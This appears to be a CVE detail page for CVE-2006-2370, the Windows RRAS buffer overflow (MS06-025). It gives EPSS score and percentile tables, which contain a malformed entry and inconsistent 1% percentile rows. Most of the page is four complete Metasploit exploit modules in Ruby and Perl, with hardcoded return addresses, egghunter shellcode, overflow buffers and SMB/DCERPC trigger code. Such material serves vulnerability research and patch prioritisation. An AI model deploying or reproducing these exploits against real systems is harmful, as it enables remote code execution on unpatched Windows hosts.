CVE-2006-2370 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	75.73%	–	–
2023-03-12	–	–	–	94.36%	–
2023-04-23	–	–	–	92.85%	–
2023-05-07	–	–	–	92.85%	–
2023-05-28	–	–	–	93.62%	–
2023-07-02	–	–	–	91.86%	–
2023-07-23	–	–	–	91.86%	–
2023-08-13	–	–	–	86.61%	–
2023-09-17	–	–	–	94.57%	–
2023-11-12	–	–	–	93.61%	–
2023-12-24	–	–	–	92.56%	–
2024-06-02	–	–	–	92.56%	–
2024-10-06	–	–	–	93.04%	–
2024-12-22	–	–	–	95.41%	–
2025-01-19	–	–	–	95.41%	–
2025-03-18	–	–	–	–	79.66%
2025-03-30	–	–	–	–	79.85%
2025-03-30	–	–	–	–	79.85,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-04-23	98%
2023-05-07	99%
2023-05-28	99%
2023-07-02	98%
2023-07-23	99%
2023-08-13	98%
2023-09-17	99%
2023-11-12	99%
2023-12-24	99%
2024-06-02	99%
2024-10-06	99%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

## # $Id: ms06_025_rasmans_reg.rb 10150 2010-08-25 20:55:37Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow', 'Description' => %q{ This module exploits a registry-based stack buffer overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook }, 'Author' => [ 'pusscat', 'hdm' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 10150 $', 'References' => [ [ 'CVE', '2006-2370' ], [ 'OSVDB', '26437' ], [ 'BID', '18325' ], [ 'MSB', 'MS06-025' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 512, 'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 13 2006')) register_options( [ OptString.new('SMBPIPE', [ true, "Rawr.", 'router']), ], self.class) end # Post authentication bugs are rarely useful during automation def autofilter false end def exploit connect() smb_login() print_status("Trying target #{target.name}...") # Generate the egghunter payload hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) egg = hunter[1] # Pick a "filler" character that we know doesn't get mangled # by the wide string conversion routines filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7" fil = filset[ rand(filset.length) ].chr # Bind to the actual DCERPC interface handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle}") dcerpc_bind(handle) print_status("Bound to #{handle}") # Add giant blocks of guard data before and after the egg eggdata = fil * 1024 + egg + fil * 1024 # Place the egghunter where ESI happens to point bof = (fil * 178) bof[84, hunter[0].length] = hunter[0] # Overwrite the SEH ptr, even though ESP is smashed # The handle after the ret must be an invalid address pat = (fil * 886) + NDR.long(target.ret) + (fil * 3) + "\xc0" + bof type2 = NDR.string( (fil * 1024) + "\x00" ) + NDR.string( pat + "\x00" ) + NDR.string( (fil * 4096) + "\x00" ) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) type1 = NDR.long(rand(0xffffffff)) + # OperatorDial NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber NDR.long(rand(0xffffffff)) + # UseLocation NDR.long(rand(0xffffffff)) + # ShowLights NDR.long(rand(0xffffffff)) + # ShowConnectStatus NDR.long(rand(0xffffffff)) + # CloseOnDial NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits NDR.long(rand(0xffffffff)) + # SkipConnectComplete NDR.long(rand(0xffffffff)) + # NewEntryWizard NDR.long(rand(0xffffffff)) + # RedialAttempts NDR.long(rand(0xffffffff)) + # RedialSeconds NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery NDR.long(rand(0xffffffff)) + # CallbackMode NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc NDR.wstring("\x00" * 129) + NDR.long(rand(0xffffffff)) + NDR.wstring("\x00" * 520) + NDR.wstring("\x00" * 520) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + NDR.string("\x00" * 514) + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) stubdata = type1 + NDR.long(rand(0xffffffff)) + eggdata print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') begin print_status('Creating the malicious registry key...') response = dcerpc.call(0xA, stubdata) print_status('Attempting to trigger the base pointer overwrite...') response = dcerpc.call(0xA, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse end handler disconnect end end

## # $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft RRAS Service Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. }, 'Author' => [ 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2006-2370' ], [ 'OSVDB', '26437' ], [ 'BID', '18325' ], [ 'MSB', 'MS06-025' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1104, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ], [ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ], ], 'DisclosureDate' => 'Jun 13 2006')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']), ], self.class) end # Post authentication bugs are rarely useful during automation def autofilter false end def exploit connect() smb_login() handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status('Getting OS...') # Check the remote OS name and version os = smb_peer_os pat = '' case os when /Windows 5\.0/ pat = payload.encoded + "\xeb\x06" + rand_text_alphanumeric(2) + [target.ret].pack('V') + "\xe9\xb7\xfb\xff\xff" os = 'Windows 2000' when /Windows 5\.1/ pat = rand_text_alphanumeric(0x4c) + "\xeb\x06" + rand_text_alphanumeric(2) + [target.ret].pack('V') + payload.encoded os = 'Windows XP' end req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length) len = req.length stb = NDR.long(0x20000) + NDR.long(len) + req + NDR.long(len) print_status("Calling the vulnerable function on #{os}...") begin dcerpc.call(0x0C, stb) rescue Rex::Proto::DCERPC::Exceptions::NoResponse rescue => e if e.to_s !~ /STATUS_PIPE_DISCONNECTED/ raise e end end # Cleanup handler disconnect end end

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::rras_ms06_025_rasman; use base "Msf::Exploit"; use strict; use Pex::DCERPC; use Pex::SMB; use Pex::NDR; my $advanced = { 'FragSize' => [ 256, 'The DCERPC fragment size' ], 'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ], 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], }; my $info = { 'Name' => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'Pusscat <pusscat [at] gmail.com>', 'H D Moore <hdm [at] metasploit.com>' ], 'Arch' => ['x86'], 'OS' => [ 'win32', 'win2000', 'winxp' ], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [ 1, 'ADDR', 'The target address' ], # SMB connection options 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ], 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''], 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ], 'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ], }, 'Payload' => { 'Space' =>1024, 'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24", # sub esp, 4097 + inc esp makes stack happy 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Description' => Pex::Text::Freeform( qq{ This module exploits a registry-based stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook } ), 'Refs' => [ [ 'BID', '18325' ], [ 'CVE', '2006-2370' ], [ 'OSVDB', '26437' ], [ 'MSB', 'MS06-025' ] ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ], [ 'Windows 2000', 0x750217ae ], # call esi ], 'Keys' => ['rras'], 'DisclosureDate' => 'Jun 13 2006', }; sub new { my ($class) = @_; my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ ); return ($self); } sub Exploit { my ($self) = @_; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my $FragSize = $self->GetVar('FragSize') || 256; my $target = $self->Targets->[$target_idx]; my ( $res, $rpc ); my $pipe = "\\" . $self->GetVar("SMBPIPE"); my $uuid = '20610036-fa22-11cf-9823-00a0c911e5df'; my $version = '1.0'; my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe ); my $dce = Pex::DCERPC->new( 'handle' => $handle, 'username' => $self->GetVar('SMBUSER'), 'password' => $self->GetVar('SMBPASS'), 'domain' => $self->GetVar('SMBDOM'), 'fragsize' => $self->GetVar('FragSize'), 'bindevasion' => $self->GetVar('BindEvasion'), 'directsmb' => $self->GetVar('DirectSMB'), ); if ( !$dce ) { $self->PrintLine("[*] Could not bind to $handle"); return; } my $smb = $dce->{'_handles'}{$handle}{'connection'}; if ( $target->[0] =~ /Auto/ ) { if ( $smb->PeerNativeOS eq 'Windows 5.0' ) { $target = $self->Targets->[1]; $self->PrintLine('[*] Detected a Windows 2000 target...'); } #elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) { # $target = $self->Targets->[2]; # $self->PrintLine('[*] Detected a Windows XP target...'); #} else { $self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() ); return; } } # Shiny new egghunt from the 3.0 code :-) my $egghunt = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" . "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" . "\x41\x41\x41\x41". "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"; # Pick a "filler" character that we know doesn't get mangled # by the wide string conversion routines my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"; my $filler = substr($fillset, rand(length($fillset)), 1); my $eggtag = ''; my $pattern = ''; while (length($eggtag) < 4) { $eggtag .= substr($fillset, rand(length($fillset)), 1); } # Configure the egg substr($egghunt, 0x12, 4, $eggtag); # We use an egghunter to give us nearly unlimited room for shellcode my $eggdata = ($filler x 1024). $eggtag. $eggtag. $shellcode. ($filler x 1024); # Mini-payload that launches the egghunt my $bof = $filler x 178; substr($bof, 84, length($egghunt), $egghunt); # Base pointer override occurs with this string my $pat = ($filler x 886). pack('V', $target->[1]). ($filler x 3). "\xc0". $bof; # The vulnerability is triggered with the second field of this structure my $type2 = Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ). Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ). Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ). Pex::NDR::Long( int(rand(0xffffffff)) ). Pex::NDR::Long( int(rand(0xffffffff)) ); # Another gigantic structure, many of these fields up as registry values my $type1 = Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode Pex::NDR::Long(0x45). $type2. Pex::NDR::UnicodeConformantVaryingString("\x00" x 129). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::UnicodeConformantVaryingString("\x00" x 520). Pex::NDR::UnicodeConformantVaryingString("\x00" x 520). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::UnicodeConformantVaryingString("\x00" x 514). Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::Long(int(rand(0xffffffff))); # Create the actual RPC stub and tack our payload on the end my $stub = $type1. Pex::NDR::Long(int(rand(0xffffffff))). $eggdata; $self->PrintLine("[*] Creating the malicious registry key..."); my @response = $dce->request( $handle, 0x0A, $stub ); $self->PrintLine("[*] Triggering the base pointer overwrite..."); my @response = $dce->request( $handle, 0x0A, $stub ); if (@response) { $self->PrintLine('[*] RPC server responded with:'); foreach my $line (@response) { $self->PrintLine( '[*] ' . $line ); } $self->PrintLine('[*] This probably means that the system is patched'); } return; } 1; # milw0rm.com [2006-06-29]

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::rras_ms06_025; use base "Msf::Exploit"; use strict; use Pex::DCERPC; use Pex::NDR; my $advanced = { 'FragSize' => [ 256, 'The DCERPC fragment size' ], 'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ], 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], }; my $info = { 'Name' => 'Microsoft RRAS MSO6-025 Stack Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 'H D Moore <hdm [at] metasploit.com>' ], 'Arch' => ['x86'], 'OS' => [ 'win32', 'win2000', 'winxp' ], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [ 1, 'ADDR', 'The target address' ], # SMB connection options 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ], 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''], 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ], 'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ], }, 'Payload' => { 'Space' => 1104, 'BadChars' => "\x00", 'Keys' => ['+ws2ord'], # sub esp, 4097 + inc esp makes stack happy 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Description' => Pex::Text::Freeform( qq{ This module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. } ), 'Refs' => [ [ 'BID', '18325' ], [ 'CVE', '2006-2370' ], [ 'OSVDB', '26437' ], [ 'MSB', 'MS06-025' ] ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ], [ 'Windows 2000', 0x7571c1e4 ], # pop/pop/ret [ 'Windows XP SP1', 0x7248d4cc ], # pop/pop/ret ], 'Keys' => ['rras'], 'DisclosureDate' => 'Jun 13 2006', }; sub new { my ($class) = @_; my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ ); return ($self); } sub Exploit { my ($self) = @_; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my $FragSize = $self->GetVar('FragSize') || 256; my $target = $self->Targets->[$target_idx]; my ( $res, $rpc ); if ( !$self->InitNops(128) ) { $self->PrintLine("[*] Failed to initialize the nop module."); return; } my $pipe = "\\" . $self->GetVar("SMBPIPE"); my $uuid = '20610036-fa22-11cf-9823-00a0c911e5df'; my $version = '1.0'; my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe ); my $dce = Pex::DCERPC->new( 'handle' => $handle, 'username' => $self->GetVar('SMBUSER'), 'password' => $self->GetVar('SMBPASS'), 'domain' => $self->GetVar('SMBDOM'), 'fragsize' => $self->GetVar('FragSize'), 'bindevasion' => $self->GetVar('BindEvasion'), 'directsmb' => $self->GetVar('DirectSMB'), ); if ( !$dce ) { $self->PrintLine("[*] Could not bind to $handle"); return; } my $smb = $dce->{'_handles'}{$handle}{'connection'}; if ( $target->[0] =~ /Auto/ ) { if ( $smb->PeerNativeOS eq 'Windows 5.0' ) { $target = $self->Targets->[1]; $self->PrintLine('[*] Detected a Windows 2000 target...'); } elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) { $target = $self->Targets->[2]; $self->PrintLine('[*] Detected a Windows XP target...'); } else { $self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() ); return; } } my $pattern = ''; if ($target->[0] =~ /Windows 2000/) { $pattern = pack( 'V', 1 ) . pack( 'V', 0x49 ) . $shellcode . "\xeb\x06" . Pex::Text::AlphaNumText(2). pack( 'V', $target->[1] ) . "\xe9\xb7\xfb\xff\xff" ; } elsif( $target->[0] =~ /Windows XP/) { $pattern = pack( 'V', 1 ) . pack( 'V', 0x49 ) . Pex::Text::AlphaNumText(0x4c). "\xeb\x06" . Pex::Text::AlphaNumText(2). pack( 'V', $target->[1] ) . $shellcode; } else { self->PrintLine( '[*] No target available...'); return; } # need to produce an exception my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern)); my $len = length ($request); my $stub = Pex::NDR::Long( int( 0x20000 ) ) . Pex::NDR::Long( int( $len ) ) . $request . Pex::NDR::Long( int( $len ) ); $self->PrintLine("[*] Sending request..."); my @response = $dce->request( $handle, 0x0C, $stub ); if (@response) { $self->PrintLine('[*] RPC server responded with:'); foreach my $line (@response) { $self->PrintLine( '[*] ' . $line ); } $self->PrintLine('[*] This probably means that the system is patched'); } return; } 1; # milw0rm.com [2006-06-22]